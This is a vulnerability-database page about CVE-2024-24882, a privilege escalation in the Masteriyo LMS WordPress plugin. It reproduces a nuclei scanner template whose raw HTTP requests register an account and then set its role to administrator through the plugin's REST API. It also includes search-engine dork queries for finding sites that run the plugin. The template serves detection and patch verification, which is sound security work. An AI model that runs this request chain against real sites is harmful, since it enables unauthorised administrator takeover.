Lucene search
K

Masteriyo LMS <= 1.7.2 - Unauthenticated Privilege Escalation

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Unauthenticated privilege escalation in Masteriyo LMS up to version 1.7.2 grants administrator access; upgrade to 1.7.3.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-24882
19 Feb 202521:02
circl
CNNVD
WordPress plugin LMS 安全漏洞
17 May 202400:00
cnnvd
CVE
CVE-2024-24882
17 May 202408:48
cve
Cvelist
CVE-2024-24882 WordPress LMS by Masteriyo plugin <= 1.7.2 - Privilege Escalation vulnerability
17 May 202408:48
cvelist
EUVD
EUVD-2024-22245
3 Oct 202520:07
euvd
NVD
CVE-2024-24882
17 May 202409:15
nvd
OSV
CVE-2024-24882
17 May 202409:15
osv
Patchstack
WordPress Masteriyo - LMS Plugin <= 1.7.2 is vulnerable to Privilege Escalation
5 Apr 202400:00
patchstack
Patchstack
WordPress LMS by Masteriyo plugin <= 1.7.2 - Privilege Escalation vulnerability
5 Apr 202408:49
patchstack
Positive Technologies
PT-2024-20638
17 May 202400:00
ptsecurity
Rows per page
id: CVE-2024-24882

info:
  name: Masteriyo LMS <= 1.7.2 - Unauthenticated Privilege Escalation
  author: riteshs4hu
  severity: critical
  description: |
    The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the update_logged_in_user() function in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.
  impact: |
    An unauthenticated attacker can escalate privileges and gain full administrator access.
  remediation: |
    Update the Masteriyo LMS plugin to version 1.7.3 or later and ensure proper capability checks are enforced.
  reference:
    - https://wpscan.com/vulnerability/8407f428-12e7-4549-aa65-a241b7bdca41/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system/masteriyo-lms-172-unauthenticated-privilege-escalation
    - https://plugins.trac.wordpress.org/changeset/3022839/learning-management-system/tags/1.7.3/includes/RestApi/Controllers/Version1/UsersController.php?old=2959283&old_path=learning-management-system%2Ftrunk%2Fincludes%2FRestApi%2FControllers%2FVersion1%2FUsersController.php
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24882
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-24882
    epss-score: 0.02112
    epss-percentile: 0.79574
    cwe-id: CWE-269
    cpe: cpe:2.3:a:themegrill:masteriyo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: themegrill
    product: masteriyo
    fofa-query: body="/wp-content/plugins/learning-management-system/"
    google-query: inurl:"/wp-content/plugins/learning-management-system/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,lms,priv-esc,learning-management-system,vkev,intrusive

variables:
  uname: "{{rand_base(4)}}"

http:
  - raw:
      - |
        GET /account/signup/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: wpnonce
        group: 1
        regex:
          - 'name="_wpnonce"[^>]*?value="([A-Za-z0-9]+)"'
        internal: true

  - raw:
      - |
        POST /account/signup/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        remember=true&first-name={{uname}}&last-name={{uname}}&username={{uname}}&email={{uname}}%40gmail.com&password=Test%40123&confirm-password=Test%40123&_wpnonce={{wpnonce}}&_wp_http_referer=%2Faccount%2Fsignup%2F&masteriyo-registration=yes

    redirects: true

  - raw:
      - |
        GET /account/ HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    extractors:
      - type: regex
        name: profile_nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([a-zA-Z0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-json/masteriyo/v1/users/me/?_locale=user HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{profile_nonce}}
        Content-Type: application/json

        {"first_name":"{{uname}}","last_name":"{{uname}}","email":"{{uname}}@gmail.com","role":"administrator","billing":{"state":"No state found"}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(tolower(content_type), "application/json")'
          - 'contains(body, "\"roles\":[\"administrator\"]")'
        condition: and
# digest: 4a0a00473045022100a39fa187dfae5cf9ffca7d98afd992cde72b44807ffc8889fcc721facb0d068602203727b6cce56df5467e9a1787cca1f2fdd17aae7f7857a4f50df0db3a356695d1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation